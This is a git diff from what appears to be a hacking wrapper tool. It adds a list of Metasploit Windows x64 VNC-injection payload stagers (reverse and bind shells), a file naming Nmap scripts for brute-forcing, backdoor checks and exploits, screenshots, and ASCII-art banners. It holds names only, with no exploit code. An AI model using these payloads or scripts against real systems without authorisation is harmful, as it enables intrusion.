538 windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager + 539 windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) + 540 windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) + 541 windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) + 542 windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager + 543 windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 544 windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) + 545 windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) + 546 windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) + + diff --git a/tools/screenshot1.png b/tools/screenshot1.png new file mode 100644 index 0000000..09bf7aa Binary files /dev/null and b/tools/screenshot1.png differ diff --git a/tools/screenshot2.png b/tools/screenshot2.png new file mode 100644 index 0000000..1a401ae Binary files /dev/null and b/tools/screenshot2.png differ diff --git a/tools/screenshot3.5.png b/tools/screenshot3.5.png new file mode 100644 index 0000000..80de2e1 Binary files /dev/null and b/tools/screenshot3.5.png differ diff --git a/tools/screenshot3.png b/tools/screenshot3.png new file mode 100644 index 0000000..6bb98bc Binary files /dev/null and b/tools/screenshot3.png differ diff --git a/tools/screenshot4.png b/tools/screenshot4.png new file mode 100644 index 0000000..8af234e Binary files /dev/null and b/tools/screenshot4.png differ diff --git a/tools/screenshot5.png b/tools/screenshot5.png new file mode 100644 index 0000000..b34dc38 Binary files /dev/null and b/tools/screenshot5.png differ diff --git a/tools/screenshot6.png b/tools/screenshot6.png new file mode 100644 index 0000000..3c426a9 Binary files /dev/null and b/tools/screenshot6.png differ diff --git a/tools/screenshot7.png b/tools/screenshot7.png new file mode 100644 index 0000000..6d0745c Binary files /dev/null and b/tools/screenshot7.png differ diff --git a/tools/scripts.txt b/tools/scripts.txt new file mode 100644 index 0000000..8554fb4 --- /dev/null +++ b/tools/scripts.txt @@ -0,0 +1,295 @@ +acarsd-info ip-forwarding +address-info ip-geolocation-geoplugin +afp-brute ip-geolocation-ipinfodb +afp-ls ip-geolocation-map-bing +afp-path-vuln ip-geolocation-map-google +afp-serverinfo ip-geolocation-map-kml +afp-showmount ip-geolocation-maxmind +ajp-auth ip-https-discover +ajp-brute ipidseq +ajp-headers ipmi-brute +ajp-methods ipmi-cipher-zero +ajp-request ipmi-version +allseeingeye-info ipv6-multicast-mld-list +amqp-info ipv6-node-info +asn-query ipv6-ra-flood +auth-owners irc-botnet-channels +auth-spoof irc-brute +backorifice-brute irc-info +backorifice-info irc-sasl-brute +bacnet-info irc-unrealircd-backdoor +banner iscsi-brute +bitcoin-getaddr iscsi-info +bitcoin-info isns-info +bitcoinrpc-info jdwp-exec +bittorrent-discovery jdwp-info +bjnp-discover jdwp-inject +broadcast-ataoe-discover jdwp-version +broadcast-avahi-dos knx-gateway-discover +broadcast-bjnp-discover knx-gateway-info +broadcast-db2-discover krb5-enum-users +broadcast-dhcp6-discover ldap-brute +broadcast-dhcp-discover ldap-novell-getpass +broadcast-dns-service-discovery ldap-rootdse +broadcast-dropbox-listener ldap-search +broadcast-eigrp-discovery lexmark-config +broadcast-igmp-discovery llmnr-resolve +broadcast-listener lltd-discovery +broadcast-ms-sql-discover maxdb-info +broadcast-netbios-master-browser mcafee-epo-agent +broadcast-networker-discover membase-brute +broadcast-novell-locate membase-http-info +broadcast-ospf2-discover memcached-info +broadcast-pc-anywhere metasploit-info +broadcast-pc-duo metasploit-msgrpc-brute +broadcast-pim-discovery metasploit-xmlrpc-brute +broadcast-ping mikrotik-routeros-brute +broadcast-pppoe-discover mmouse-brute +broadcast-rip-discover mmouse-exec +broadcast-ripng-discover modbus-discover +broadcast-sonicwall-discover mongodb-brute +broadcast-sybase-asa-discover mongodb-databases +broadcast-tellstick-discover mongodb-info +broadcast-upnp-info mqtt-subscribe +broadcast-versant-locate mrinfo +broadcast-wake-on-lan msrpc-enum +broadcast-wpad-discover ms-sql-brute +broadcast-wsdd-discover ms-sql-config +broadcast-xdmcp-discover ms-sql-dac +cassandra-brute ms-sql-dump-hashes +cassandra-info ms-sql-empty-password +cccam-version ms-sql-hasdbaccess +cics-enum ms-sql-info +cics-info ms-sql-ntlm-info +cics-user-brute ms-sql-query +cics-user-enum ms-sql-tables +citrix-brute-xml ms-sql-xp-cmdshell +citrix-enum-apps mtrace +citrix-enum-apps-xml murmur-version +citrix-enum-servers mysql-audit +citrix-enum-servers-xml mysql-brute +clamav-exec mysql-databases +clock-skew mysql-dump-hashes +coap-resources mysql-empty-password +couchdb-databases mysql-enum +couchdb-stats mysql-info +creds-summary mysql-query +cups-info mysql-users +cups-queue-info mysql-variables +cvs-brute mysql-vuln-cve2012-2122 +cvs-brute-repository nat-pmp-info +daap-get-library nat-pmp-mapport +daytime nbd-info +db2-das-info nbstat +deluge-rpc-brute ncp-enum-users +dhcp-discover ncp-serverinfo +dict-info ndmp-fs-info +distcc-cve2004-2687 ndmp-version +dns-blacklist nessus-brute +dns-brute nessus-xmlrpc-brute +dns-cache-snoop netbus-auth-bypass +dns-check-zone netbus-brute +dns-client-subnet-scan netbus-info +dns-fuzz netbus-version +dns-ip6-arpa-scan nexpose-brute +dns-nsec3-enum nfs-ls +dns-nsec-enum nfs-showmount +dns-nsid nfs-statfs +dns-random-srcport nje-node-brute +dns-random-txid nje-pass-brute +dns-recursion nntp-ntlm-info +dns-service-discovery nping-brute +dns-srv-enum nrpe-enum +dns-update ntp-info +dns-zeustracker ntp-monlist +dns-zone-transfer omp2-brute +docker-version omp2-enum-targets +domcon-brute omron-info +domcon-cmd openlookup-info +domino-enum-users openvas-otp-brute +dpap-brute openwebnet-discovery +drda-brute oracle-brute +drda-info oracle-brute-stealth +duplicates oracle-enum-users +eap-info oracle-sid-brute +enip-info oracle-tns-version +epmd-info ovs-agent-version +eppc-enum-processes p2p-conficker +fcrdns path-mtu +finger pcanywhere-brute +fingerprint-strings pcworx-info +firewalk pgsql-brute +firewall-bypass pjl-ready-message +flume-master-info pop3-brute +fox-info pop3-capabilities +freelancer-info pop3-ntlm-info +ftp-anon pptp-version +ftp-bounce puppet-naivesigning +ftp-brute qconn-exec +ftp-libopie qscan +ftp-proftpd-backdoor quake1-info +ftp-syst quake3-info +ftp-vsftpd-backdoor quake3-master-getservers +ftp-vuln-cve2010-4221 rdp-enum-encryption +ganglia-info rdp-vuln-ms12-020 +giop-info realvnc-auth-bypass +gkrellm-info redis-brute +gopher-ls redis-info +gpsd-info resolveall +hadoop-datanode-info reverse-index +hadoop-jobtracker-info rexec-brute +hadoop-namenode-info rfc868-time +hadoop-secondary-namenode-info riak-http-info +hadoop-tasktracker-info rlogin-brute +hbase-master-info rmi-dumpregistry +hbase-region-info rmi-vuln-classloader +hddtemp-info rpcap-brute +hnap-info rpcap-info +hostmap-bfk rpc-grind +hostmap-crtsh rpcinfo +hostmap-ip2hosts rsa-vuln-roca +hostmap-robtex rsync-brute +http-adobe-coldfusion-apsa1301 rsync-list-modules +http-affiliate-id rtsp-methods +http-apache-negotiation rtsp-url-brute +http-apache-server-status rusers +http-aspnet-debug s7-info +http-auth-finder samba-vuln-cve-2012-1182 +http-auth script.db +http-avaya-ipoffice-users servicetags +http-awstatstotals-exec shodan-api +http-axis2-dir-traversal sip-brute +http-backup-finder sip-call-spoof +http-barracuda-dir-traversal sip-enum-users +http-bigip-cookie sip-methods +http-brute skypev2-version +http-cakephp-version smb2-capabilities +http-chrono smb2-security-mode +http-cisco-anyconnect smb2-time +http-coldfusion-subzero smb2-vuln-uptime +http-comments-displayer smb-brute +http-config-backup smb-double-pulsar-backdoor +http-cookie-flags smb-enum-domains +http-cors smb-enum-groups +http-cross-domain-policy smb-enum-processes +http-csrf smb-enum-services +http-date smb-enum-sessions +http-default-accounts smb-enum-shares +http-devframework smb-enum-users +http-dlink-backdoor smb-flood +http-dombased-xss smb-ls +http-domino-enum-passwords smb-mbenum +http-drupal-enum smb-os-discovery +http-drupal-enum-users smb-print-text +http-enum smb-protocols +http-errors smb-psexec +http-exif-spider smb-security-mode +http-favicon smb-server-stats +http-feed smb-system-info +http-fetch smb-vuln-conficker +http-fileupload-exploiter smb-vuln-cve2009-3103 +http-form-brute smb-vuln-cve-2017-7494 +http-form-fuzzer smb-vuln-ms06-025 +http-frontpage-login smb-vuln-ms07-029 +http-generator smb-vuln-ms08-067 +http-git smb-vuln-ms10-054 +http-gitweb-projects-enum smb-vuln-ms10-061 +http-google-malware smb-vuln-ms17-010 +http-grep smb-vuln-regsvc-dos +http-headers smtp-brute +http-huawei-hg5xx-vuln smtp-commands +http-icloud-findmyiphone smtp-enum-users +http-icloud-sendmsg smtp-ntlm-info +http-iis-short-name-brute smtp-open-relay +http-iis-webdav-vuln smtp-strangeport +http-internal-ip-disclosure smtp-vuln-cve2010-4344 +http-joomla-brute smtp-vuln-cve2011-1720 +http-jsonp-detection smtp-vuln-cve2011-1764 +http-litespeed-sourcecode-download sniffer-detect +http-ls snmp-brute +http-majordomo2-dir-traversal snmp-hh3c-logins +http-malware-host snmp-info +http-mcmp snmp-interfaces +http-methods snmp-ios-config +http-method-tamper snmp-netstat +http-mobileversion-checker snmp-processes +http-ntlm-info snmp-sysdescr +http-open-proxy snmp-win32-services +http-open-redirect snmp-win32-shares +http-passwd snmp-win32-software +http-phpmyadmin-dir-traversal snmp-win32-users +http-phpself-xss socks-auth-info +http-php-version socks-brute +http-proxy-brute socks-open-proxy +http-put ssh2-enum-algos +http-qnap-nas-info ssh-auth-methods +http-referer-checker ssh-brute +http-rfi-spider ssh-hostkey +http-robots.txt ssh-publickey-acceptance +http-robtex-reverse-ip ssh-run +http-robtex-shared-ns sshv1 +http-security-headers ssl-ccs-injection +http-server-header ssl-cert-intaddr +http-shellshock ssl-cert +http-sitemap-generator ssl-date +http-slowloris-check ssl-dh-params +http-slowloris ssl-enum-ciphers +http-sql-injection ssl-heartbleed +http-stored-xss ssl-known-key +http-svn-enum ssl-poodle +http-svn-info sslv2-drown +http-title sslv2 +http-tplink-dir-traversal sstp-discover +http-trace stun-info +http-traceroute stun-version +http-trane-info stuxnet-detect +http-unsafe-output-escaping supermicro-ipmi-conf +http-useragent-tester svn-brute +http-userdir-enum targets-asn +http-vhosts targets-ipv6-map4to6 +http-virustotal targets-ipv6-multicast-echo +http-vlcstreamer-ls targets-ipv6-multicast-invalid-dst +http-vmware-path-vuln targets-ipv6-multicast-mld +http-vuln-cve2006-3392 targets-ipv6-multicast-slaac +http-vuln-cve2009-3960 targets-ipv6-wordlist +http-vuln-cve2010-0738 targets-sniffer +http-vuln-cve2010-2861 targets-traceroute +http-vuln-cve2011-3192 targets-xml +http-vuln-cve2011-3368 teamspeak2-version +http-vuln-cve2012-1823 telnet-brute +http-vuln-cve2013-0156 telnet-encryption +http-vuln-cve2013-6786 telnet-ntlm-info +http-vuln-cve2013-7091 tftp-enum +http-vuln-cve2014-2126 tls-alpn +http-vuln-cve2014-2127 tls-nextprotoneg +http-vuln-cve2014-2128 tls-ticketbleed +http-vuln-cve2014-2129 tn3270-screen +http-vuln-cve2014-3704 tor-consensus-checker +http-vuln-cve2014-8877 traceroute-geolocation +http-vuln-cve2015-1427 tso-brute +http-vuln-cve2015-1635 tso-enum +http-vuln-cve2017-1001000 unittest +http-vuln-cve2017-5638 unusual-port +http-vuln-cve2017-5689 upnp-info +http-vuln-cve2017-8917 url-snarf +http-vuln-misfortune-cookie ventrilo-info +http-vuln-wnr1000-creds versant-info +http-waf-detect vmauthd-brute +http-waf-fingerprint vmware-version +http-webdav-scan vnc-brute +http-wordpress-brute vnc-info +http-wordpress-enum vnc-title +http-wordpress-users voldemort-info +http-xssed vtam-enum +iax2-brute vuze-dht-info +iax2-version wdb-version +icap-info weblogic-t3-info +iec-identify whois-domain +ike-version whois-ip +imap-brute wsdd-discover +imap-capabilities x11-access +imap-ntlm-info xdmcp-discover +impress-remote-discover xmlrpc-methods +informix-brute xmpp-brute +informix-query xmpp-info +informix-tables diff --git a/tools/skull.txt b/tools/skull.txt new file mode 100644 index 0000000..805cc55 --- /dev/null +++ b/tools/skull.txt @@ -0,0 +1,45 @@ + /\ + /..\ + / .. \ + / .. \ + / .. \ + | :: | + | :: | + | :: | + | :: | + .o oOOOOOOOo | :: | OOOo + Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO + OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO type ? + OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' for help + `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo + .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO + OOOOO '"OOOOOOOOOOOOOOOO"` oOO + oOOOOOba. .adOOOOOOOOOOba .adOOOOo. + oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO + OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO + "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" + Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` + : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . + . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo + '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': + `$" `OOOO' `O"Y | `OOOO' o . + . . OP" :: | : o . + | :: | + | :: | + . | /\ | . + |\ | / \ | /| + | `-._ | / \ | _.-' | + \ `-._ |/ \| _.-' / + \ `-' `-' / + `-._ @tuf_unkn0wn _.-' + `-._ _.-' + `-.________.-' + |\\\V///A| + |\\V///A\| + |\V///A\\| + |V///A\\\| + |//A\\\V/| + |/A\\\V//| + |/A\\\V//| + _|_.----._|_ + |__________| diff --git a/tcp b/tools/tcp similarity index 100% rename from tcp rename to tools/tcp diff --git a/tools/venombanner.txt b/tools/venombanner.txt new file mode 100644 index 0000000..fc3019b --- /dev/null +++ b/tools/venombanner.txt @@ -0,0 +1,43 @@ +------------------------------------------------------------------ + .o@*hu + .. ......... .u*" ^Rc + oP""*Lo*#"""""""""""7d" .d*N. $ + @ u@"" .u*" o*" #L ?b + @ " " .d" .d@@e$ ?b. + 8 @*@me@# '"Nu + @ '#b + .P $r + .@" $L $ + .@" 8"R dP + .d#" .dP d" .d# + xP .e .ud#" dE.o@"( + $ s*" .u@*"" '""\dP" + ?L .. ..o@"" .$ uP + #c:$"*u. .u@*""$ uR .@" + ?L$. '"""***Nc x@"" @" d" JP + ^#$. #L .$ 8" d" d" + ' "b.'$. @" $" 8" + '"*@$L $" $ @ + @L $" d" 8\ + $$u.u$" dF dF + $ """ o dP xR + $ dFNu...@" $ + "N.. ?B ^""" :R + """"* RL d> + "$u. .$ + ^"*bo@" + + + ██▒ █▓▓█████ ███▄ █ ▒█████ ███▄ ▄███▓ + ▓██░ █▒▓█ ▀ ██ ▀█ █ ▒██▒ ██▒▓██▒▀█▀ ██▒ + ▓██ █▒░▒███ ▓██ ▀█ ██▒▒██░ ██▒▓██ ▓██░ + ▒██ █░░▒▓█ ▄ ▓██▒ ▐▌██▒▒██ ██░▒██ ▒██ + ▒▀█░ ░▒████▒▒██░ ▓██░░ ████▓▒░▒██▒ ░██▒ + ░ ▐░ ░░ ▒░ ░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▒░ ░ ░ + ░ ░░ ░ ░ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ░ ░ ░ + ░░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ + ░ ░ ░ ░ ░ ░ ░ + ░ +------------------------------------------------------------------ +| Created by @tuf_unkn0wn type ? for help | +------------------------------------------------------------------